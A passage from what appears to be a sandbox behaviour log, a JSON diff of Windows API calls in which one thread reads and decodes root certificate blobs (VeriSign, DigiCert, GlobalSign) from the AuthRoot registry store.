"BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\742C3192E607E424EB4549542BE1BBC53E6174E2\\Blob" + } + ], + "repeated": 1, + "id": 1596 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd7\\xc6;\\xe0\\x83}\\xba\\xbf\\x88\\x1dO\\xbf_\\x98j\\xd8\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x10\\xfcc]\\xf6&>\r\\xf3%\\xbe_y\\xcdgg\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00F\\x00\\x00\\x00V\\x00e\\x00r\\x00i\\x00S\\x00i\\x00g\\x00n\\x00 \\x00C\\x00l\\x00a\\x00s\\x00s\\x00 \\x003\\x00 \\x00P\\x00u\\x00b\\x00l\\x00i\\x00c\\x00 \\x00P\\x00r\\x00i\\x00m\\x00a\\x00r\\x00y\\x00 \\x00C\\x00A\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00*\\x00\\x00\\x000(\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xe2\\x7f{\\xd8w\\xd5\\xdf\\x9e\n?\\x9e\\xb4\\xcb\\x0e.\\xa9\\xef\\xdbiw\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00'\\xb3Qvg3\\x1c\\xe2\\xc1\\xe7@\\x02\\xb5\\xff\"\\x98\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00t,1\\x92\\xe6\\x07\\xe4$\\xebEIT+\\xe1\\xbb\\xc5>at\\xe2\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04 \\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x02\\x00\\x000\\x82\\x02<0\\x82\\x01\\xa5\\x02\\x10p\\xba\\xe4\\x1d\\x10\\xd9)4\\xb68\\xca{\\x03\\xcc\\xba\\xbf0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x02\\x05\\x000_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1705\\x06\\x03U\\x04\\x0b\\x13.Class 3 Public Primary Certification Authority0\\x1e\\x17\r960129000000Z\\x17\r280801235959Z0_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\742C3192E607E424EB4549542BE1BBC53E6174E2\\Blob" + } + ], + "repeated": 0, + "id": 1597 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1598 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767ef4e2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x02<0\\x82\\x01\\xa5\\x02\\x10p\\xba\\xe4\\x1d\\x10\\xd9)4\\xb68\\xca{\\x03\\xcc\\xba\\xbf0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x02\\x05\\x000_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1705\\x06\\x03U\\x04\\x0b\\x13.Class 3 Public Primary Certification Authority0\\x1e\\x17\r960129000000Z\\x17\r280801235959Z0_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1705\\x06\\x03U\\x04\\x0b\\x13.Class 3 Public Primary Certificatio" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 1599 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "Index", + "value": "5" + } + ], + "repeated": 0, + "id": 1600 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000538" + }, + { + "name": "ObjectAttributesName", + "value": "7E04DE896A3E666D00E687D33FFAD93BE83D349E" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\7E04DE896A3E666D00E687D33FFAD93BE83D349E" + } + ], + "repeated": 0, + "id": 1601 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\7E04DE896A3E666D00E687D33FFAD93BE83D349E\\Blob" + } + ], + "repeated": 1, + "id": 1602 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xb0\t\\xe9\\x9a\\\\xfc\\x92\\x8a\\x171\\x90\\x10m\\xbb2\\xa9\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00~\\x04\\xde\\x89j>fm\\x00\\xe6\\x87\\xd3?\\xfa\\xd9;\\xe8=4\\x9e\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd0\\xab9\\xed\\xd1\\xa4\\xd8\\x9aU\\x12\\x88-\\xeb\t\\xcb\\x13\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xb3\\xdbH\\xa4\\xf9\\xa1\\xc5\\xd8\\xae6A\\xcc\\x11cib)\\xbcK\\xc6b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x001\\xadfH\\xf8\\x10A8\\xc78\\xf3\\x9e\\xa42\\x0139>:\\x18\\xcc\\x02)n\\xf9|*\\xc9\\xefg1\\xd0\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00D\\x00i\\x00g\\x00i\\x00C\\x00e\\x00r\\x00t\\x00 \\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00G\\x003\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x0002\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00\\x82\\xc8\\x01\\x999w\"\\xb5z\\xd4s\\xea&k\\x93\\xd4\\x7f\\xfcw\\xfe\\x07\\xf0\\x93\\x884_ \\xda\\xb6\\xad\\xdd\\x08vr\\xf9\\x88\\xb4\\xbb\\xfd\\x15LK\\x130\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x0f:\\x05'\\xd2B\\xde-\\xc9\\x8e\\\\xfc\\xb1\\xe9\\x91\\xee \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xb3\\x03\\x00\\x000\\x82\\x03\\xaf0\\x82\\x02\\x97\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x08;\\xe0V\\x90BF\\xb1\\xa1uj\\xc9Y\\x91\\xc7J0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x00" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\\Blob" + } + ], + "repeated": 0, + "id": 1609 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1610 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767ef4e2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x03\\xaf0\\x82\\x02\\x97\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x08;\\xe0V\\x90BF\\xb1\\xa1uj\\xc9Y\\x91\\xc7J0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000a1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x150\\x13\\x06\\x03U\\x04\n\\x13\\x0cDigiCert Inc1\\x190\\x17\\x06\\x03U\\x04\\x0b\\x13\\x10www.digicert.com1 0\\x1e\\x06\\x03U\\x04\\x03\\x13\\x17DigiCert Global Root CA0\\x1e\\x17\r061110000000Z\\x17\r311110000000Z0a1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x150\\x13\\x06\\x03U\\x04\n\\x13\\x0cDigiCert Inc1\\x190\\x17\\x06\\x03U\\x04\\x0b\\x13\\x10www.digicert.com1 0\\x1e\\x06\\x03U\\x04\\x03\\x13\\x17Dig" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 1611 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "Index", + "value": "7" + } + ], + "repeated": 0, + "id": 1612 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000538" + }, + { + "name": "ObjectAttributesName", + "value": "B1BC968BD4F49D622AA89A81F2150152A41D829C" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C" + } + ], + "repeated": 0, + "id": 1613 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob" + } + ], + "repeated": 1, + "id": 1614 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xa8#\\xb4\\xa2\\x01\\x80\\xbe\\xb4`\\xca\\xb9U\\xc2M~!\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xb1\\xbc\\x96\\x8b\\xd4\\xf4\\x9db*\\xa8\\x9a\\x81\\xf2\\x15\\x01R\\xa4\\x1d\\x82\\x9c~\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x04+\\xebw\\xd5\\x01z\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x7f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00n\\xe7\\xf3\\xb0`\\xd1\\x0e\\x90\\xa3\\x1b\\xa3G\\x1b\\x99\\x926\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00`{f\\x1aE\r\\x97\\xca\\x89P/}\\x04\\xcd4\\xa8\\xff\\xfc\\xfdKb\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xeb\\xd4\\x10@\\xe4\\xbb>\\xc7B\\xc9\\xe3\\x81\\xd3\\x1e\\xf2\\xa4\\x1aH\\xb6h\\\\x96\\xe7\\xce\\xf3\\xc1\\xdfl\\xd43\\x1c\\x99\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00S\\x00i\\x00g\\x00n\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00A\\x00 \\x00-\\x00 \\x00R\\x001\\x00\\x00\\x00S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t+\\x06\\x01\\x04\\x01\\xa02\\x01\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00h\\x00\\x00\\x000f\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x08\\x02\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x06\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x07\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00Zm\\x07\\xb67\\x1d\\x96j/\\xb6\\xba\\x92\\x82\\x8c\\xe5Q" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob" + } + ], + "repeated": 0, + "id": 1615 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1616 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767ef4e2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x03u0\\x82\\x02]\\xa0\\x03\\x02\\x01\\x02\\x02\\x0b\\x04\\x00\\x00\\x00\\x00\\x01\\x15KZ\\xc3\\x940\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000W1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02BE1\\x190\\x17\\x06\\x03U\\x04\n\\x13\\x10GlobalSign nv-sa1\\x100\\x0e\\x06\\x03U\\x04\\x0b\\x13\\x07Root CA1\\x1b0\\x19\\x06\\x03U\\x04\\x03\\x13\\x12GlobalSign Root CA0\\x1e\\x17\r980901120000Z\\x17\r280128120000Z0W1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02BE1\\x190\\x17\\x06\\x03U\\x04\n\\x13\\x10GlobalSign nv-sa1\\x100\\x0e\\x06\\x03U\\x04\\x0b\\x13\\x07Root CA1\\x1b0\\x19\\x06\\x03U\\x04\\x03\\x13\\x12GlobalSign Root CA0\\x82\\x01\"0" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 1617 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "Index", + "value": "8" + } + ], + "repeated": 0, + "id": 1618 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000538" + }, + { + "name": "ObjectAttributesName", + "value": "DF3C24F9BFD666761B268073FE06D1CC8D4F82A4" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4" + } + ], + "repeated": 0, + "id": 1619 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\\Blob" + } + ], + "repeated": 1, + "id": 1620 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x14\\xc3\\xbd5I\\xee\"Z\\xec\\xe174\\xad\\x8c\\xa0\\xb8\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xdf<$\\xf9\\xbf\\xd6fv\\x1b&\\x80s\\xfe\\x06\\xd1\\xcc\\x8dO\\x82\\xa4~\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x80\\xc8+h\\x86\\xd7\\x01\\x7f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00}\\xc3\\x0b\\xc9tiU`\\xa2\\xf0\t\neEUl\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00N\"T \\x18\\x95\\xe6\\xe3n\\xe6\\x0f\\xfa\\xfa\\xb9\\x12\\xed\\x06\\x17\\x8f9b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xcb<\\xcb\\xb7`1\\xe5\\xe0\\x13\\x8f\\x8d\\xd3\\x9a#\\xf9\\xdeG\\xff\\xc3^C\\xc1\\x14L\\xea'\\xd4jZ\\xb1\\xcb_\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00D\\x00i\\x00g\\x00i\\x00C\\x00e\\x00r\\x00t\\x00 \\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00G\\x002\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x0002\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00KN\\xb4\\xb0t)\\x8b\\x82\\x8b\\\\x000\\x95\\xa1\\x0bE#\\xfb\\x95\\x1c\\x0c\\x884\\x8b\t\\xc5>[\\xab\\xa4\\x08\\xa3\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xe4\\xa6\\x8a\\xc8T\\xacRBF\n\\xfdrH\\x1b*D \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x92\\x03\\x00\\x000\\x82\\x03\\x8e" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\\Blob" + } + ], + "repeated": 0, + "id": 1621 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1622 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00564000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1623 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767ef4e2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x03\\x8e0\\x82\\x02v\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x03:\\xf1\\xe6\\xa7\\x11\\xa9\\xa0\\xbb(d\\xb1\\x1d\t\\xfa\\xe50\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000a1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x150\\x13\\x06\\x03U\\x04\n\\x13\\x0cDigiCert Inc1\\x190\\x17\\x06\\x03U\\x04\\x0b\\x13\\x10www.digicert.com1 0\\x1e\\x06\\x03U\\x04\\x03\\x13\\x17DigiCert Global Root G20\\x1e\\x17\r130801120000Z\\x17\r380115120000Z0a1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x150\\x13\\x06\\x03U\\x04\n\\x13\\x0cDigiCert Inc1\\x190\\x17\\x06\\x03U\\x04\\x0b\\x13\\x10www.digicert.com1 0\\x1e\\x06\\x03U\\x04\\x03\\x13\\x17Dig" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 1624 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + 